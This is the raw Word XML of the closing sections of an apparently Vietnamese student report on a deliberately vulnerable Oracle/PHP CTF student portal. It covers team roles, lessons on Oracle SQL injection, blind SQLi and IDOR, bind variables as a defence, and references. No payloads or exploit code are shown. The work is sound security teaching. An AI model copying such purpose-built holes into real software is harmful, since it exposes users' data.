          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Database XE và OCI8 cần cài thủ công. setup.sh mặc định copy source từ thư mục local. Nếu dùng GitHub, sửa biến REPO_URL trong setup.sh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. PHÂN CÔNG CÔNG VIỆC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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Thành viên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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Nhiệm vụ chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4726"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="023E8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Chi tiết công việc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Member 1 (Leader)</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Design + Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Kiến trúc hệ thống, viết báo cáo, điều phối</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Member 2</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Backend PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="472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Viết tất cả file PHP: login, search, transcript, admin...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Member 3</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Oracle Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="47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Schema, seed data, flag data, tài khoản Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Member 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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Security + CTF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4726"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F1F3F5" w:val="clear"/>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Thiết kế 3 lỗ hổng, flag logic, fake flags, exploit scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Member 5</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Deployment + Docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4726"/>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">setup.sh, README, troubleshooting, chuẩn bị demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Những gì đã học được</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhóm đã hiểu sâu về SQL Injection thực tế trên Oracle (DUAL, ROWNUM, USER_TABLES), phân biệt IDOR vs Authorization logic flaw, kỹ thuật Blind SQLi với boolean-based extraction, cách dùng OCI8 bind variables để phòng tránh SQLi, và cách thiết kế CTF challenge đa tầng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Khó khăn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt Oracle XE trên Ubuntu phức tạp hơn MySQL/PostgreSQL. OCI8 extension cần cài thủ công và phụ thuộc Instant Client. Oracle SQL syntax khác biệt (không có LIMIT, dùng ROWNUM; không có INFORMATION_SCHEMA, dùng USER_TABLES). Cân bằng độ khó giữa 3 flag để đảm bảo tất cả đều Very Hard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Hướng phát triển</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bổ sung thêm lỗ hổng Oracle-specific: Time-Based Blind SQLi, XML Injection, Privilege Escalation. Tích hợp WAF demo. Xây dựng hệ thống tự động chấm điểm CTF. Triển khai lên OCI Free Tier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] OWASP Foundation. (2021). OWASP Top 10:2021 – A03 Injection. https://owasp.org/Top10/A03_2021-Injection/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] Oracle Corporation. (2023). Oracle Database Security Guide 21c. https://docs.oracle.com/en/database/oracle/oracle-database/21/dbseg/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] PortSwigger. (2023). SQL Injection Cheat Sheet – Oracle. https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] PortSwigger. (2023). Insecure Direct Object References (IDOR). https://portswigger.net/web-security/access-control/idor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] IBM Security. (2023). Cost of a Data Breach Report 2023. https://www.ibm.com/reports/data-breach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] PHP Manual. OCI8 Extension. https://www.php.net/manual/en/book.oci8.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] CWE-89: Improper Neutralization of Special Elements in SQL Command. https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] CWE-639: Authorization Bypass Through User-Controlled Key. https://cwe.mitre.org/data/definitions/639.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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D04" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6C757D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Strengthening Database Security with Oracle Database</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6C757D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Trang </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6C757D"/>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4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="80" w:before="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6C757D"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">DBS401 – Group 07  |  FPT Student Portal – Oracle Security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E85D0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23E8A"/>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2026-05-17T14:48:58.857Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T14:48:58.858Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>